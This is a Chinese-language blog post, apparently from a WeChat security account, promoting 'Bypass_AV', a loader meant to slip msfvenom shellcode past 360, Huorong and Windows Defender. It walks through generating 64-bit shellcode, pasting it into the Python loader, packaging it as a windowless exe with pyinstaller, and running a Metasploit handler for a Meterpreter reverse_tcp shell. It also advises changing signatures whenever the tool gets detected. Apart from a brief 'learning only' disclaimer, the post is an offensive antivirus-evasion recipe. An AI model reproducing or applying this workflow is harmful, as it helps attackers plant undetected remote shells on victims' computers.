神兵利器 | 免杀工具 Bypass_AV​

一、工具简介

Bypass_AV msf免杀，ShellCode免杀加载器 ，免杀shellcode执行程序 ，360&火绒&Windows Defender。代码够简单，估计要不了多久就进特征库了，被杀了再去改几个特征码照样又可以免杀，保持更新。

二、使用方法

1、环境

2022年5月8日 测试可以免杀国内杀软 火绒&360及Windows Defender

Windows 10 64位 360&火绒&Windows Defender

Windows 7 64位 或以上操作系统应该都没问题（没有测试）

2、使用msfvenom生成ShellCode(ShellCode 需要是64位的)

3、加载器

将生成的ShellCode 填至 Bypass_AV.py 里的 ShellCode = '''ShellCode''' 处，注意：保留原始ShellCode 里的双引号 "

4、打包成可执行程序

Python 3.8.6

pyinstaller 4.7

pip install pyinstaller 

pyinstaller -F -w Bypss_AV.py

生成Bypass_AV.exe在dist目录中

5、运行监听

msfconsolemsf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set lhost 0.0.0.0msf6 exploit(multi/handler) > set lport 8080msf6 exploit(multi/handler) > run

三、检测效果

四、工具下载

1、通过项目地址下载

>精彩回顾<

坚持学习与分享！走过路过点个"在看"，不会错过

仅用于学习交流，不得用于非法用途

如侵权请私聊公众号删文

觉得文章不错给点个‘再看’吧